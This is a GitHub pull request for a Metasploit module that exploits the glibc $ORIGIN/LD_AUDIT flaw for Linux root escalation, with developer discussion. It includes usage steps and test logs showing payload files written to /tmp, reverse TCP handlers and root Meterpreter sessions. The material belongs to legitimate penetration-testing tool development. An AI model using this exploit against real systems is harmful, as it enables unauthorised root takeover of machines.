Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add glibc $ORIGIN Expansion Privilege Escalation exploit #9467

Closed
wants to merge 4 commits into from

Conversation

@bcoles
Copy link
Contributor

bcoles commented Jan 27, 2018

Add glibc $ORIGIN Expansion Privilege Escalation exploit.

    This module attempts to gain root privileges on Linux systems by abusing
    a vulnerability in the GNU C Library (glibc) dynamic linker.

    glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not
    properly restrict use of the LD_AUDIT environment variable when loading
    setuid executables which allows control over the $ORIGIN library search
    path resulting in execution of arbitrary shared objects.

    This module opens a file descriptor to the specified suid executable via
    a hard link, then replaces the hard link with a shared object before
    instructing the linker to execute the file descriptor, resulting in
    arbitrary code execution.

    The specified setuid binary must be readable and located on the same
    file system partition as the specified writable directory.

    This module has been tested successfully on glibc version 2.5 on CentOS
    5.4 (x86_64), 2.5 on CentOS 5.5 (x86_64) and 2.12 on Fedora 13 (i386).

    RHEL 5 is reportedly affected, but untested. Some versions of ld.so
    hit a failed assertion in dl_open_worker causing exploitation to fail.

Verification

  • Start msfconsole
  • Get a session
  • use exploit/linux/local/glibc_origin_expansion_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf5 exploit(multi/handler) > use exploit/linux/local/glibc_origin_expansion_priv_esc 
msf5 exploit(linux/local/glibc_origin_expansion_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/glibc_origin_expansion_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[+] The target appears to be vulnerable
[*] Using target: Linux x86
[*] Writing '/tmp/.R5Ork' (1279 bytes) ...
[*] Writing '/tmp/.yE35DWbLd' (320 bytes) ...
[*] Writing '/tmp/.sk7Z3Vl7vJ' (207 bytes) ...
[*] Launching exploit...
[*] Sending stage (857352 bytes) to 172.16.191.138
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.138:59187) at 2018-01-27 04:21:24 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : fedora13.localdomain
OS           : Fedora 13 (Linux 2.6.33.3-85.fc13.i686.PAE)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
@wvu-r7

This comment has been minimized.

Copy link
Member

wvu-r7 commented Jan 28, 2018

This one's a "classic" fave! ;)

@bcoles bcoles added the delayed label Feb 1, 2018
@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 1, 2018

Delayed pending fix for #9482

@bcoles bcoles added docs and removed needs-docs labels Feb 3, 2018
@bcoles bcoles removed the delayed label Feb 7, 2018
@h00die h00die self-assigned this Feb 9, 2018
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 9, 2018

Ubuntu 10.04 x64

msf exploit(linux/local/glibc_origin_expansion_priv_esc) > set verbose 1
verbose => true
msf exploit(linux/local/glibc_origin_expansion_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] GNU C Library version 2.11.1 is vulnerable
[-] Exploit failed: NoMethodError undefined method `setuid?' for #<Msf::Modules::Mod6578706c6f69742f6c696e75782f6c6f63616c2f676c6962635f6f726967696e5f657870616e73696f6e5f707269765f657363::MetasploitModule:0x0000562a6e7543d0>
Did you mean?  setup
[*] Exploit completed, but no session was created.
@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 9, 2018

@h00die setuid? was added to lib/msf/core/post/file.rb a couple of weeks ago in #9446.

Edit: Yeah, this didn't work on Ubuntu. It hit a failed assertion in dl_open_worker.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 9, 2018

did a rebase, compiles now.
Ubuntu 10.04 x64 should be vuln according to the docs that are linked, but it killed my original session for me.

msf5 exploit(linux/local/glibc_origin_expansion_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] GNU C Library version 2.11.1 is vulnerable
[+] /bin/ping is setuid
[+] /bin/ping is readable
[+] The target appears to be vulnerable
[+] '/bin/ping' and '/tmp' are located on the same partition
[*] System architecture is x86_64
[*] Using target: Linux x64
[*] Writing '/tmp/.igpZGagV' (1913 bytes) ...
[*] Max line length is 65537
[*] Writing 1913 bytes in 1 chunks of 4371 bytes (octal-encoded), using printf
[*] Writing '/tmp/.yxtnoClTtS' (311 bytes) ...
[*] Max line length is 65537
[*] Writing 311 bytes in 1 chunks of 1093 bytes (octal-encoded), using printf
[*] Writing '/tmp/.5O3IOFVyX' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] 2.2.2.2 - Command shell session 1 closed.  Reason: Died from EOFError
[*] 2.2.2.2 - Command shell session 1 closed.
[-] Failed to delete /tmp/.igpZGagV: closed stream
[-] Failed to delete /tmp/.yxtnoClTtS: closed stream
[-] Failed to delete /tmp/.PZuXhOp: closed stream
[-] Failed to delete /tmp/.5O3IOFVyX: closed stream
[*] Exploit completed, but no session was created.

(waiting on my centos 5.5 to finish downloading)

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 9, 2018

since the check worked out correctly, local exploit suggester may suggest it. Maybe add in a check to fail on Ubuntu?

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 9, 2018

I'm hesitant to fail on all versions of Ubuntu. As you suggest, documentation suggests that Ubuntu is affected.

Killing the session is bad. I might have to implement the same work around as the other glibc module:

    # The echo at the end of the command is required
    # else the original session may die
    output = cmd_exec "#{exp_path}& echo "

This only seems to be necessary for shell sessions.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 9, 2018

I have to do some ESX patching, then get centos 5.5 installed, so you got a little to test changes

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 9, 2018

Latest commit seems to have fixed premature session termination for shell sessions on Ubuntu.

As for check - the module currently returns CheckCode::Appears as the highest level of certainty, which seems appropriate, but I could add a fallback to CheckCode::Detected for Ubuntu if you think that would be better.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 9, 2018

centos 5.5 doesn't play nice on my esxi, no mouse, no nic, and that was as far as I cared to go. Switching to Fedora 13, hopefully better results.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 9, 2018

confirmed ubuntu session is no longer killed

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 9, 2018

Excellent. The premature termination of shell sessions upon backgrounding a program during a cmd_exec call is possibly (likely?) a bug with cmd_exec. I haven't had time to investigate and create an issue on the tracker, but the issue only seems to appear on shell sessions, and only on old *nix systems.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 10, 2018

Fedora 13 was a good test

msf5 exploit(linux/local/glibc_origin_expansion_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] GNU C Library version 2.12 is vulnerable
[+] /bin/ping is setuid
[+] /bin/ping is readable
[+] The target appears to be vulnerable
[+] '/bin/ping' and '/tmp' are located on the same partition
[*] System architecture is x86_64
[*] Using target: Linux x64
[*] Writing '/tmp/.GGqazPNz8' (1913 bytes) ...
[*] Max line length is 65537
[*] Writing 1913 bytes in 1 chunks of 4366 bytes (octal-encoded), using printf
[*] Writing '/tmp/.t7vLjiShY' (332 bytes) ...
[*] Max line length is 65537
[*] Writing 332 bytes in 1 chunks of 1148 bytes (octal-encoded), using printf
[*] Writing '/tmp/.y7OwDC' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 192.168.2.32
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:56281) at 2018-02-10 07:01:50 -0500
[+] Deleted /tmp/.t7vLjiShY
[+] Deleted /tmp/.SBC8HlI13
[+] Deleted /tmp/.y7OwDC

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : Fedora 13 (Linux 2.6.33.3-85.fc13.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 10, 2018

also good on meterp for fedora13

h00die added a commit that referenced this pull request Feb 10, 2018
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 10, 2018

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 10, 2018

merged this, not sure why (unless its just delayed) its still saying open....

It may be worth throwing in a comment to the docs about Ubuntu being vulnerable, but the exploit not working against it. Figured that could be a quick add to the docs, and didn't want to hold this up any longer over a one liner.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 10, 2018

Release Notes

The exploits/linux/local/glibc_origin_expansion_priv_esc module has been added to the framework. This module abuses a vulnerability in the GNU C Library (glibc) dynamic linker on older (Fedora 13, Centos 5.5) operating systems for privilege escalation.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 10, 2018

ah, i think yesterday i may have done a rebase to get that setuid? function, but may have messed it up which may have messed up linking the merge correctly

@bcoles bcoles closed this Feb 10, 2018
@bcoles bcoles deleted the bcoles:glibc_origin_expansion_priv_esc branch Feb 10, 2018
@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 11, 2018

Thanks. Yeah I'd say that's what happened.

I'm not sure if it's best practice for a PR author to rebase within a PR? It would drag the merge into master. Not a big deal I guess.

I'll create a separate PR for the minor doco updates.

Closed this PR.

jmartin-r7 added a commit to jmartin-r7/metasploit-framework that referenced this pull request Feb 12, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

4 participants
You can’t perform that action at this time.